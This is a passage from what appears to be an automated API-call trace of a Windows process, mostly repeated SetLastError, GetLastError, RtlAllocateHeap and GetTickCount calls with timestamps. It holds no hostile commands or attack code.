SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x0, Size=0x43) returned 0x1fb1990 [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.715] SetLastError (dwErrCode=0x0) [0048.715] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.716] SetLastError (dwErrCode=0x0) [0048.716] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.717] GetLastError () returned 0x0 [0048.717] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.718] GetLastError () returned 0x0 [0048.718] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.719] SetLastError (dwErrCode=0x0) [0048.719] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.720] SetLastError (dwErrCode=0x0) [0048.720] GetLastError () returned 0x0 [0048.721] SetLastError (dwErrCode=0x0) [0048.721] GetLastError () returned 0x0 [0048.721] SetLastError (dwErrCode=0x0) [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x98) returned 0x1fb19e0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x1f) returned 0x1fb1a80 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x36) returned 0x1fb1aa8 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x37) returned 0x1fb1ae8 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x3c) returned 0x1fb1b28 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x31) returned 0x1fb1b70 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x17) returned 0x1fb1bb0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x24) returned 0x1fb1bd0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x14) returned 0x1fb1c00 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0xd) returned 0x1fb1c20 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x25) returned 0x1fb1c38 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x39) returned 0x1fb1c68 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x18) returned 0x1fb1cb0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x17) returned 0x1fb1cd0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0xe) returned 0x1fb1cf0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x69) returned 0x1fb1d08 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x3e) returned 0x1fb1d80 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x1b) returned 0x1fb1dc8 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x1d) returned 0x1fb1df0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x48) returned 0x1fb1e18 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x12) returned 0x1fb1e68 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x18) returned 0x1fb1e88 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x1b) returned 0x1fb1ea8 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x24) returned 0x1fb1ed0 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x29) returned 0x1fb1f00 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x1e) returned 0x1fb1f38 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x41) returned 0x1fb1f60 [0048.721] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x17) returned 0x1fb1fb0 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0xf) returned 0x1fb1fd0 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x16) returned 0x1fb1fe8 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x2a) returned 0x1fb2008 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x29) returned 0x1fb2040 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x15) returned 0x1fb2078 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x1e) returned 0x1fb2098 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x2a) returned 0x1fb20c0 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x12) returned 0x1fb20f8 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x18) returned 0x1fb2118 [0048.722] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x46) returned 0x1fb2138 [0048.722] HeapFree (in: hHeap=0x1fb0000, dwFlags=0x0, lpMem=0x1fb11f8 | out: hHeap=0x1fb0000) returned 1 [0048.722] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0048.722] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0048.722] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0048.724] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x800) returned 0x1fb2188 [0048.724] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x80) returned 0x1fb11f8 [0048.724] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4056dc) returned 0x0 [0048.725] RtlSizeHeap (HeapHandle=0x1fb0000, Flags=0x0, MemoryPointer=0x1fb11f8) returned 0x80 [0048.725] GetLastError () returned 0x0 [0048.725] SetLastError (dwErrCode=0x0) [0048.725] GetLastError () returned 0x0 [0048.725] SetLastError (dwErrCode=0x0) [0048.725] GetLastError () returned 0x0 [0048.725] SetLastError (dwErrCode=0x0) [0048.725] GetLastError () returned 0x0 [0048.725] SetLastError (dwErrCode=0x0) [0048.725] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.728] GetLastError () returned 0x0 [0048.728] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.729] GetLastError () returned 0x0 [0048.729] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.730] SetLastError (dwErrCode=0x0) [0048.730] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.731] SetLastError (dwErrCode=0x0) [0048.731] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.732] SetLastError (dwErrCode=0x0) [0048.732] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetLastError () returned 0x0 [0048.733] SetLastError (dwErrCode=0x0) [0048.733] GetTickCount () returned 0x1147179 [0048.733] GetLastError () returned 0x0 [0048.733] GetTickCount () returned 0x1147179 [0048.733] GetLastError () returned 0x0 [0048.733] GetTickCount () returned 0x1147179 [0048.733] GetLastError () returned 0x0 [0048.733] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.734] GetTickCount () returned 0x1147179 [0048.734] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.735] GetLastError () returned 0x0 [0048.735] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.736] GetLastError () returned 0x0 [0048.736] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.737] GetLastError () returned 0x0 [0048.737] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.738] GetLastError () returned 0x0 [0048.738] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.739] GetLastError () returned 0x0 [0048.739] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.740] GetLastError () returned 0x0 [0048.740] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.741] GetTickCount () returned 0x1147179 [0048.741] GetLastError () returned 0x0 [0048.742] GetTickCount () returned 0x1147188 [0048.742] GetLastError () returned 0x0 [0048.742] GetTickCount () returned 0x1147188 [0048.742] GetLastError () returned 0x0 [0048.742] GetTickCount () returned 0x1147188 [0048.742] GetLastError () returned 0x0 [0048.742] GetTickCount () returned 0x1147188 [0048.742] GetLastError () returned 0x0 [0048.742] GetTickCount () returned 0x1147188 [0048.742] GetLastError () returned 0x0 [0048.742] GetTickCount () returned 0x1147188 [0048.742] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.743] GetLastError () returned 0x0 [0048.743] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] 